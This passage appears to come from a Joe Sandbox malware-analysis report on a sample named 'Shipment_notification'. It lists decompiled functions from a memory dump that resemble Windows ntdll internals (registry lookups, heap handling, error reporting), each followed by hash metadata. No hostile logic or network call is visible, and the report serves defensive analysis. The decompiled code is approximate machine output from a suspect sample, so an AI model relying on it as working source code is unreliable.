                                                                                				void* _t51;
                                                                                				void* _t58;
                                                                                				signed short _t82;
                                                                                				short _t84;
                                                                                				signed int _t91;
                                                                                				signed int _t100;
                                                                                				signed short* _t103;
                                                                                				void* _t108;
                                                                                				intOrPtr* _t109;
                                                                                
                                                                                				_t103 = __ecx;
                                                                                				_t82 = __edx;
                                                                                				_t51 = E01B04120(0, __ecx, 0,  &_v52, 0, 0, 0);
                                                                                				if(_t51 >= 0) {
                                                                                					_push(0x21);
                                                                                					_push(3);
                                                                                					_v56 =  *0x7ffe02dc;
                                                                                					_v20 =  &_v52;
                                                                                					_push( &_v44);
                                                                                					_v28 = 0x18;
                                                                                					_push( &_v28);
                                                                                					_push(0x100020);
                                                                                					_v24 = 0;
                                                                                					_push( &_v60);
                                                                                					_v16 = 0x40;
                                                                                					_v12 = 0;
                                                                                					_v8 = 0;
                                                                                					_t58 = E01B29830();
                                                                                					_t87 =  *[fs:0x30];
                                                                                					_t108 = _t58;
                                                                                					L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                                                                                					if(_t108 < 0) {
                                                                                						L11:
                                                                                						_t51 = _t108;
                                                                                					} else {
                                                                                						_push(4);
                                                                                						_push(8);
                                                                                						_push( &_v36);
                                                                                						_push( &_v44);
                                                                                						_push(_v60);
                                                                                						_t108 = E01B29990();
                                                                                						if(_t108 < 0) {
                                                                                							L10:
                                                                                							_push(_v60);
                                                                                							E01B295D0();
                                                                                							goto L11;
                                                                                						} else {
                                                                                							_t109 = L01B04620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
                                                                                							if(_t109 == 0) {
                                                                                								_t108 = 0xc0000017;
                                                                                								goto L10;
                                                                                							} else {
                                                                                								_t21 = _t109 + 0x18; // 0x18
                                                                                								 *((intOrPtr*)(_t109 + 4)) = _v60;
                                                                                								 *_t109 = 1;
                                                                                								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                                                                                								 *(_t109 + 0xe) = _t82;
                                                                                								 *((intOrPtr*)(_t109 + 8)) = _v56;
                                                                                								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                                                                                								E01B2F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
                                                                                								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                								 *((short*)(_t109 + 0xc)) =  *_t103;
                                                                                								_t91 =  *_t103 & 0x0000ffff;
                                                                                								_t100 = _t91 & 0xfffffffe;
                                                                                								_t84 = 0x5c;
                                                                                								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
                                                                                									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                                                                                										_push(_v60);
                                                                                										E01B295D0();
                                                                                										L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                                                                                										_t51 = 0xc0000106;
                                                                                									} else {
                                                                                										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                                                                                										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                                                                                										goto L5;
                                                                                									}
                                                                                								} else {
                                                                                									L5:
                                                                                									 *_a4 = _t109;
                                                                                									_t51 = 0;
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				return _t51;
                                                                                			}


                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @
                                                                                • API String ID: 0-2766056989
                                                                                • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                • Instruction ID: f6d5bcb4a8bd6424d7f670c7119741bdd64532e61af05c4f5b92060f6ccc0f00
                                                                                • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                • Instruction Fuzzy Hash: CC519F716047119FC725DF29C840A6BBBF9FF48710F008A6DFA9987690E7B4E914CB91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 75%
                                                                                			E01B63540(intOrPtr _a4) {
                                                                                				signed int _v12;
                                                                                				intOrPtr _v88;
                                                                                				intOrPtr _v92;
                                                                                				char _v96;
                                                                                				char _v352;
                                                                                				char _v1072;
                                                                                				intOrPtr _v1140;
                                                                                				intOrPtr _v1148;
                                                                                				char _v1152;
                                                                                				char _v1156;
                                                                                				char _v1160;
                                                                                				char _v1164;
                                                                                				char _v1168;
                                                                                				char* _v1172;
                                                                                				short _v1174;
                                                                                				char _v1176;
                                                                                				char _v1180;
                                                                                				char _v1192;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				short _t41;
                                                                                				short _t42;
                                                                                				intOrPtr _t80;
                                                                                				intOrPtr _t81;
                                                                                				signed int _t82;
                                                                                				void* _t83;
                                                                                
                                                                                				_v12 =  *0x1bdd360 ^ _t82;
                                                                                				_t41 = 0x14;
                                                                                				_v1176 = _t41;
                                                                                				_t42 = 0x16;
                                                                                				_v1174 = _t42;
                                                                                				_v1164 = 0x100;
                                                                                				_v1172 = L"BinaryHash";
                                                                                				_t81 = E01B20BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
                                                                                				if(_t81 < 0) {
                                                                                					L11:
                                                                                					_t75 = _t81;
                                                                                					E01B63706(0, _t81, _t79, _t80);
                                                                                					L12:
                                                                                					if(_a4 != 0xc000047f) {
                                                                                						E01B2FA60( &_v1152, 0, 0x50);
                                                                                						_v1152 = 0x60c201e;
                                                                                						_v1148 = 1;
                                                                                						_v1140 = E01B63540;
                                                                                						E01B2FA60( &_v1072, 0, 0x2cc);
                                                                                						_push( &_v1072);
                                                                                						E01B3DDD0( &_v1072, _t75, _t79, _t80, _t81);
                                                                                						E01B70C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
                                                                                						_push(_v1152);
                                                                                						_push(0xffffffff);
                                                                                						E01B297C0();
                                                                                					}
                                                                                					return L01B2B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
                                                                                				}
                                                                                				_t79 =  &_v352;
                                                                                				_t81 = E01B63971(0, _a4,  &_v352,  &_v1156);
                                                                                				if(_t81 < 0) {
                                                                                					goto L11;
                                                                                				}
                                                                                				_t75 = _v1156;
                                                                                				_t79 =  &_v1160;
                                                                                				_t81 = E01B63884(_v1156,  &_v1160,  &_v1168);
                                                                                				if(_t81 >= 0) {
                                                                                					_t80 = _v1160;
                                                                                					E01B2FA60( &_v96, 0, 0x50);
                                                                                					_t83 = _t83 + 0xc;
                                                                                					_push( &_v1180);
                                                                                					_push(0x50);
                                                                                					_push( &_v96);
                                                                                					_push(2);
                                                                                					_push( &_v1176);
                                                                                					_push(_v1156);
                                                                                					_t81 = L01B29650();
                                                                                					if(_t81 >= 0) {
                                                                                						if(_v92 != 3 || _v88 == 0) {
                                                                                							_t81 = 0xc000090b;
                                                                                						}
                                                                                						if(_t81 >= 0) {
                                                                                							_t75 = _a4;
                                                                                							_t79 =  &_v352;
                                                                                							E01B63787(_a4,  &_v352, _t80);
                                                                                						}
                                                                                					}
                                                                                					L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
                                                                                				}
                                                                                				_push(_v1156);
                                                                                				E01B295D0();
                                                                                				if(_t81 >= 0) {
                                                                                					goto L12;
                                                                                				} else {
                                                                                					goto L11;
                                                                                				}
                                                                                			}

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: BinaryHash
                                                                                • API String ID: 0-2202222882
                                                                                • Opcode ID: f9c2509833bce78020cbf4a05fae77af7dd5c135e5bdc70b0350ab96be17b613
                                                                                • Instruction ID: e646d0647c0315e8ac1748e3662acf5dc6ec28e3bae422e4a1652a2c429ded8d
                                                                                • Opcode Fuzzy Hash: f9c2509833bce78020cbf4a05fae77af7dd5c135e5bdc70b0350ab96be17b613
                                                                                • Instruction Fuzzy Hash: 0E4141B2D0052D9ADF259A50CC81FAEB7BCAB55714F0045E5EA0DAB250DB349E888F94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 71%
                                                                                			E01BB05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                                                                                				signed int _v20;
                                                                                				char _v24;
                                                                                				signed int _v28;
                                                                                				char _v32;
                                                                                				signed int _v36;
                                                                                				intOrPtr _v40;
                                                                                				void* __ebx;
                                                                                				void* _t35;
                                                                                				signed int _t42;
                                                                                				char* _t48;
                                                                                				signed int _t59;
                                                                                				signed char _t61;
                                                                                				signed int* _t79;
                                                                                				void* _t88;
                                                                                
                                                                                				_v28 = __edx;
                                                                                				_t79 = __ecx;
                                                                                				if(E01BB07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
                                                                                					L13:
                                                                                					_t35 = 0;
                                                                                					L14:
                                                                                					return _t35;
                                                                                				}
                                                                                				_t61 = __ecx[1];
                                                                                				_t59 = __ecx[0xf];
                                                                                				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
                                                                                				_v36 = _a8 << 0xc;
                                                                                				_t42 =  *(_t59 + 0xc) & 0x40000000;
                                                                                				asm("sbb esi, esi");
                                                                                				_t88 = ( ~_t42 & 0x0000003c) + 4;
                                                                                				if(_t42 != 0) {
                                                                                					_push(0);
                                                                                					_push(0x14);
                                                                                					_push( &_v24);
                                                                                					_push(3);
                                                                                					_push(_t59);
                                                                                					_push(0xffffffff);
                                                                                					if(E01B29730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
                                                                                						_push(_t61);
                                                                                						E01BAA80D(_t59, 1, _v20, 0);
                                                                                						_t88 = 4;
                                                                                					}
                                                                                				}
                                                                                				_t35 = E01BAA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
                                                                                				if(_t35 < 0) {
                                                                                					goto L14;
                                                                                				}
                                                                                				E01BB1293(_t79, _v40, E01BB07DF(_t79, _v28,  &_a4,  &_a8, 1));
                                                                                				if(E01B07D50() == 0) {
                                                                                					_t48 = 0x7ffe0380;
                                                                                				} else {
                                                                                					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                				}
                                                                                				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                                                					E01BA138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
                                                                                				}
                                                                                				goto L13;
                                                                                			}

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: `
                                                                                • API String ID: 0-2679148245
                                                                                • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                • Instruction ID: f2f282c927d3292e3a205bf33c24d13d1d9177f1c0916fbff88185cf64605e2b
                                                                                • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                • Instruction Fuzzy Hash: 3E3126327043066BEB14EE28CC85FEB7BE9EBC4754F144265FA499B680D7B0E904C791
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 72%
                                                                                			E01B63884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                                                                				char _v8;
                                                                                				intOrPtr _v12;
                                                                                				intOrPtr* _v16;
                                                                                				char* _v20;
                                                                                				short _v22;
                                                                                				char _v24;
                                                                                				intOrPtr _t38;
                                                                                				short _t40;
                                                                                				short _t41;
                                                                                				void* _t44;
                                                                                				intOrPtr _t47;
                                                                                				void* _t48;
                                                                                
                                                                                				_v16 = __edx;
                                                                                				_t40 = 0x14;
                                                                                				_v24 = _t40;
                                                                                				_t41 = 0x16;
                                                                                				_v22 = _t41;
                                                                                				_t38 = 0;
                                                                                				_v12 = __ecx;
                                                                                				_push( &_v8);
                                                                                				_push(0);
                                                                                				_push(0);
                                                                                				_push(2);
                                                                                				_t43 =  &_v24;
                                                                                				_v20 = L"BinaryName";
                                                                                				_push( &_v24);
                                                                                				_push(__ecx);
                                                                                				_t47 = 0;
                                                                                				_t48 = L01B29650();
                                                                                				if(_t48 >= 0) {
                                                                                					_t48 = 0xc000090b;
                                                                                				}
                                                                                				if(_t48 != 0xc0000023) {
                                                                                					_t44 = 0;
                                                                                					L13:
                                                                                					if(_t48 < 0) {
                                                                                						L16:
                                                                                						if(_t47 != 0) {
                                                                                							L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
                                                                                						}
                                                                                						L18:
                                                                                						return _t48;
                                                                                					}
                                                                                					 *_v16 = _t38;
                                                                                					 *_a4 = _t47;
                                                                                					goto L18;
                                                                                				}
                                                                                				_t47 = L01B04620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                                                                				if(_t47 != 0) {
                                                                                					_push( &_v8);
                                                                                					_push(_v8);
                                                                                					_push(_t47);
                                                                                					_push(2);
                                                                                					_push( &_v24);
                                                                                					_push(_v12);
                                                                                					_t48 = L01B29650();
                                                                                					if(_t48 < 0) {
                                                                                						_t44 = 0;
                                                                                						goto L16;
                                                                                					}
                                                                                					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
                                                                                						_t48 = 0xc000090b;
                                                                                					}
                                                                                					_t44 = 0;
                                                                                					if(_t48 < 0) {
                                                                                						goto L16;
                                                                                					} else {
                                                                                						_t17 = _t47 + 0xc; // 0xc
                                                                                						_t38 = _t17;
                                                                                						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
                                                                                							_t48 = 0xc000090b;
                                                                                						}
                                                                                						goto L13;
                                                                                					}
                                                                                				}
                                                                                				_t48 = _t48 + 0xfffffff4;
                                                                                				goto L18;
                                                                                			}

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: BinaryName
                                                                                • API String ID: 0-215506332
                                                                                • Opcode ID: 243cc4862f4bc6c9b9d142b718348c444407e2658d95410e3dde56f8ec7070a1
                                                                                • Instruction ID: 2f6705ebcec189ba6434192c6ee8463cceeff1998117aeb893ce2d646e4904ca
                                                                                • Opcode Fuzzy Hash: 243cc4862f4bc6c9b9d142b718348c444407e2658d95410e3dde56f8ec7070a1
                                                                                • Instruction Fuzzy Hash: 0D31EA32D0051AAFEF19DA58C945D6BBBF8FB60720F0141A9E91DA72A1D7349E04CB90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 33%
                                                                                			E01B1D294(void* __ecx, char __edx, void* __eflags) {
                                                                                				signed int _v8;
                                                                                				char _v52;
                                                                                				signed int _v56;
                                                                                				signed int _v60;
                                                                                				intOrPtr _v64;
                                                                                				char* _v68;
                                                                                				intOrPtr _v72;
                                                                                				char _v76;
                                                                                				signed int _v84;
                                                                                				intOrPtr _v88;
                                                                                				char _v92;
                                                                                				intOrPtr _v96;
                                                                                				intOrPtr _v100;
                                                                                				char _v104;
                                                                                				char _v105;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				signed int _t35;
                                                                                				char _t38;
                                                                                				signed int _t40;
                                                                                				signed int _t44;
                                                                                				signed int _t52;
                                                                                				void* _t53;
                                                                                				void* _t55;
                                                                                				void* _t61;
                                                                                				intOrPtr _t62;
                                                                                				void* _t64;
                                                                                				signed int _t65;
                                                                                				signed int _t66;
                                                                                
                                                                                				_t68 = (_t66 & 0xfffffff8) - 0x6c;
                                                                                				_v8 =  *0x1bdd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
                                                                                				_v105 = __edx;
                                                                                				_push( &_v92);
                                                                                				_t52 = 0;
                                                                                				_push(0);
                                                                                				_push(0);
                                                                                				_push( &_v104);
                                                                                				_push(0);
                                                                                				_t59 = __ecx;
                                                                                				_t55 = 2;
                                                                                				if(E01B04120(_t55, __ecx) < 0) {
                                                                                					_t35 = 0;
                                                                                					L8:
                                                                                					_pop(_t61);
                                                                                					_pop(_t64);
                                                                                					_pop(_t53);
                                                                                					return L01B2B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
                                                                                				}
                                                                                				_v96 = _v100;
                                                                                				_t38 = _v92;
                                                                                				if(_t38 != 0) {
                                                                                					_v104 = _t38;
                                                                                					_v100 = _v88;
                                                                                					_t40 = _v84;
                                                                                				} else {
                                                                                					_t40 = 0;
                                                                                				}
                                                                                				_v72 = _t40;
                                                                                				_v68 =  &_v104;
                                                                                				_push( &_v52);
                                                                                				_v76 = 0x18;
                                                                                				_push( &_v76);
                                                                                				_v64 = 0x40;
                                                                                				_v60 = _t52;
                                                                                				_v56 = _t52;
                                                                                				_t44 = E01B298D0();
                                                                                				_t62 = _v88;
                                                                                				_t65 = _t44;
                                                                                				if(_t62 != 0) {
                                                                                					asm("lock xadd [edi], eax");
                                                                                					if((_t44 | 0xffffffff) != 0) {
                                                                                						goto L4;
                                                                                					}
                                                                                					_push( *((intOrPtr*)(_t62 + 4)));
                                                                                					E01B295D0();
                                                                                					L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
                                                                                					goto L4;
                                                                                				} else {
                                                                                					L4:
                                                                                					L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
                                                                                					if(_t65 >= 0) {
                                                                                						_t52 = 1;
                                                                                					} else {
                                                                                						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
                                                                                							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
                                                                                						}
                                                                                					}
                                                                                					_t35 = _t52;
                                                                                					goto L8;
                                                                                				}
                                                                                			}


































                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @
                                                                                • API String ID: 0-2766056989
                                                                                • Opcode ID: 888e1bc0670944a2712a3da70437a4495c324b6870e1c48e7aa2cc7f08a0a5ca
                                                                                • Instruction ID: 3beb13bec652fdaf907571c1fdec1d819f390e9901f66796b42245c07c684845
                                                                                • Opcode Fuzzy Hash: 888e1bc0670944a2712a3da70437a4495c324b6870e1c48e7aa2cc7f08a0a5ca
                                                                                • Instruction Fuzzy Hash: C631C4B15083059FC725DF68D9C495BBFE8EB85654F410A6EF99483250D734DD04CB92
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 72%
                                                                                			E01AF1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
                                                                                				intOrPtr _v8;
                                                                                				char _v16;
                                                                                				intOrPtr* _t26;
                                                                                				intOrPtr _t29;
                                                                                				void* _t30;
                                                                                				signed int _t31;
                                                                                
                                                                                				_t27 = __ecx;
                                                                                				_t29 = __edx;
                                                                                				_t31 = 0;
                                                                                				_v8 = __edx;
                                                                                				if(__edx == 0) {
                                                                                					L18:
                                                                                					_t30 = 0xc000000d;
                                                                                					goto L12;
                                                                                				} else {
                                                                                					_t26 = _a4;
                                                                                					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
                                                                                						goto L18;
                                                                                					} else {
                                                                                						E01B2BB40(__ecx,  &_v16, __ecx);
                                                                                						_push(_t26);
                                                                                						_push(0);
                                                                                						_push(0);
                                                                                						_push(_t29);
                                                                                						_push( &_v16);
                                                                                						_t30 = E01B2A9B0();
                                                                                						if(_t30 >= 0) {
                                                                                							_t19 =  *_t26;
                                                                                							if( *_t26 != 0) {
                                                                                								goto L7;
                                                                                							} else {
                                                                                								 *_a8 =  *_a8 & 0;
                                                                                							}
                                                                                						} else {
                                                                                							if(_t30 != 0xc0000023) {
                                                                                								L9:
                                                                                								_push(_t26);
                                                                                								_push( *_t26);
                                                                                								_push(_t31);
                                                                                								_push(_v8);
                                                                                								_push( &_v16);
                                                                                								_t30 = E01B2A9B0();
                                                                                								if(_t30 < 0) {
                                                                                									L12:
                                                                                									if(_t31 != 0) {
                                                                                										L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
                                                                                									}
                                                                                								} else {
                                                                                									 *_a8 = _t31;
                                                                                								}
                                                                                							} else {
                                                                                								_t19 =  *_t26;
                                                                                								if( *_t26 == 0) {
                                                                                									_t31 = 0;
                                                                                								} else {
                                                                                									L7:
                                                                                									_t31 = L01B04620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
                                                                                								}
                                                                                								if(_t31 == 0) {
                                                                                									_t30 = 0xc0000017;
                                                                                								} else {
                                                                                									goto L9;
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				return _t30;
                                                                                			}










                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: WindowsExcludedProcs
                                                                                • API String ID: 0-3583428290
                                                                                • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                • Instruction ID: 7a4da6d58a7bac06f0886a5a9bae4197fc41deee65350704be262ec70b2def21
                                                                                • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                • Instruction Fuzzy Hash: 0721D676501129EBDB269B99C840F7BBB79EB45A50F0544A9FB04CB200DB35D801D7A0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E01B0F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                				intOrPtr _t13;
                                                                                				intOrPtr _t14;
                                                                                				signed int _t16;
                                                                                				signed char _t17;
                                                                                				intOrPtr _t19;
                                                                                				intOrPtr _t21;
                                                                                				intOrPtr _t23;
                                                                                				intOrPtr* _t25;
                                                                                
                                                                                				_t25 = _a8;
                                                                                				_t17 = __ecx;
                                                                                				if(_t25 == 0) {
                                                                                					_t19 = 0xc00000f2;
                                                                                					L8:
                                                                                					return _t19;
                                                                                				}
                                                                                				if((__ecx & 0xfffffffe) != 0) {
                                                                                					_t19 = 0xc00000ef;
                                                                                					goto L8;
                                                                                				}
                                                                                				_t19 = 0;
                                                                                				 *_t25 = 0;
                                                                                				_t21 = 0;
                                                                                				_t23 = "Actx ";
                                                                                				if(__edx != 0) {
                                                                                					if(__edx == 0xfffffffc) {
                                                                                						L21:
                                                                                						_t21 = 0x200;
                                                                                						L5:
                                                                                						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
                                                                                						 *_t25 = _t13;
                                                                                						L6:
                                                                                						if(_t13 == 0) {
                                                                                							if((_t17 & 0x00000001) != 0) {
                                                                                								 *_t25 = _t23;
                                                                                							}
                                                                                						}
                                                                                						L7:
                                                                                						goto L8;
                                                                                					}
                                                                                					if(__edx == 0xfffffffd) {
                                                                                						 *_t25 = _t23;
                                                                                						_t13 = _t23;
                                                                                						goto L6;
                                                                                					}
                                                                                					_t13 =  *((intOrPtr*)(__edx + 0x10));
                                                                                					 *_t25 = _t13;
                                                                                					L14:
                                                                                					if(_t21 == 0) {
                                                                                						goto L6;
                                                                                					}
                                                                                					goto L5;
                                                                                				}
                                                                                				_t14 = _a4;
                                                                                				if(_t14 != 0) {
                                                                                					_t16 =  *(_t14 + 0x14) & 0x00000007;
                                                                                					if(_t16 <= 1) {
                                                                                						_t21 = 0x1f8;
                                                                                						_t13 = 0;
                                                                                						goto L14;
                                                                                					}
                                                                                					if(_t16 == 2) {
                                                                                						goto L21;
                                                                                					}
                                                                                					if(_t16 != 4) {
                                                                                						_t19 = 0xc00000f0;
                                                                                						goto L7;
                                                                                					}
                                                                                					_t13 = 0;
                                                                                					goto L6;
                                                                                				} else {
                                                                                					_t21 = 0x1f8;
                                                                                					goto L5;
                                                                                				}
                                                                                			}












                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Actx
                                                                                • API String ID: 0-89312691
                                                                                • Opcode ID: 8575c7214dfdd82e7661403bda4533dd8a787abbaa8a3c3bd67a1cbadfe0adc3
                                                                                • Instruction ID: 518382211b511fc2b27fcb8bee67e7470f2267d98cd6dedb79c0d6cf9fa0592f
                                                                                • Opcode Fuzzy Hash: 8575c7214dfdd82e7661403bda4533dd8a787abbaa8a3c3bd67a1cbadfe0adc3
                                                                                • Instruction Fuzzy Hash: 6C1190357046028FEB3F8E1DC4907367E95EB95664F2446AEE961CB3D1EBB0C8418343
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 71%
                                                                                			E01B98DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                				intOrPtr _t35;
                                                                                				void* _t41;
                                                                                
                                                                                				_t40 = __esi;
                                                                                				_t39 = __edi;
                                                                                				_t38 = __edx;
                                                                                				_t35 = __ecx;
                                                                                				_t34 = __ebx;
                                                                                				_push(0x74);
                                                                                				_push(0x1bc0d50);
                                                                                				E01B3D0E8(__ebx, __edi, __esi);
                                                                                				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
                                                                                				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
                                                                                				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
                                                                                					E01B75720(0x65, 0, "Critical error detected %lx\n", _t35);
                                                                                					if( *((intOrPtr*)(_t41 + 8)) != 0) {
                                                                                						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                                                                                						asm("int3");
                                                                                						 *(_t41 - 4) = 0xfffffffe;
                                                                                					}
                                                                                				}
                                                                                				 *(_t41 - 4) = 1;
                                                                                				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
                                                                                				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
                                                                                				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
                                                                                				 *((intOrPtr*)(_t41 - 0x64)) = L01B3DEF0;
                                                                                				 *((intOrPtr*)(_t41 - 0x60)) = 1;
                                                                                				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
                                                                                				_push(_t41 - 0x70);
                                                                                				L01B3DEF0(1, _t38);
                                                                                				 *(_t41 - 4) = 0xfffffffe;
                                                                                				return E01B3D130(_t34, _t39, _t40);
                                                                                			}






                                                                                Strings
                                                                                • Critical error detected %lx, xrefs: 01B98E21
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Critical error detected %lx
                                                                                • API String ID: 0-802127002
                                                                                • Opcode ID: dcd89101b8cf9bb03230f256b1854e454989efd8f3f0e02b16572e75d198f989
                                                                                • Instruction ID: da1282c5546adc5464fab818f4a0547df83e878f67be9011d7885a2e0b4e0818
                                                                                • Opcode Fuzzy Hash: dcd89101b8cf9bb03230f256b1854e454989efd8f3f0e02b16572e75d198f989
                                                                                • Instruction Fuzzy Hash: 781187B5D00748EBDF28CFB9850579CBBB0FB05311F2042AEE529AB292C3300612CF14
                                                                                Uniqueness

